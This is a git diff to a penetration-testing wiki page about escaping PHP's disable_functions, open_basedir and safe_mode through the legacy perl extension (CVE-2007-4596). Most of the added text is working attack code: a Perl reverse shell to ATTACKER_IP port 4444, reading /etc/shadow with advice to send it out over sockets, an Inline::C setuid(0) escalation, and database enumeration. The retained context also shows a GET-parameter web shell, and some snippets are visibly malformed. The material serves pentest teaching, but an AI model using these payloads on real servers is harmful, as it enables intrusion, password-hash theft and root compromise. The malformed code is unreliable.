diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
index 102dcb79936..0a9e4fb08e5 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
@@ -2,22 +2,29 @@
{{#include ../../../../banners/hacktricks-training.md}}
+## Background
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although `safe_mode` disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.
-```php
-";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
-echo "
"
-
+echo "
";
?>
```
-{{#include ../../../../banners/hacktricks-training.md}}
+## Modern Payload Enhancements
+
+### 1. Full TTY over TCP
+
+The embedded interpreter can load `IO::Socket` even if `/usr/bin/perl` is blocked:
+
+```php
+$perl = new perl();
+$payload = <<<'PL'
+use IO::Socket::INET;
+my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
+open STDIN, '<&', $c;
+open STDOUT, '>&', $c;
+open STDERR, '>&', $c;
+exec('/bin/sh -i');
+PL;
+$perl->eval($payload);
+```
+
+### 2. File-System Escape Even with `open_basedir`
+
+Perl ignores PHP’s `open_basedir`, so you can read arbitrary files:
+```php
+$perl = new perl();
+$perl->eval('open(F,"/etc/shadow") || die $!; print while ; close F;');
+```
+
+Pipe the output through `IO::Socket::INET` or `Net::HTTP` to exfiltrate data without touching PHP-managed descriptors.
+
+### 3. Inline Compilation for Privilege Escalation
+
+If `Inline::C` exists system-wide, compile helpers inside the request without relying on PHP’s `ffi` or `pcntl`:
+
+```php
+$perl = new perl();
+$perl->eval(<<<'PL'
+use Inline C => 'DATA';
+print escalate();
+__DATA__
+__C__
+char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
+PL
+);
+```
+### 4. Living-off-the-Land Enumeration
+Treat Perl as a LOLBAS toolkit—e.g., dump MySQL DSNs even if `mysqli` is missing:
+
+```php
+$perl = new perl();
+$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');
+```
+
+## References
+
+- [CVE-2007-4596 summary and timeline](https://www.cvedetails.com/cve/CVE-2007-4596/)
+- [PECL perl extension package information](https://pecl.php.net/package/perl)
+
+{{#include ../../../../banners/hacktricks-training.md}}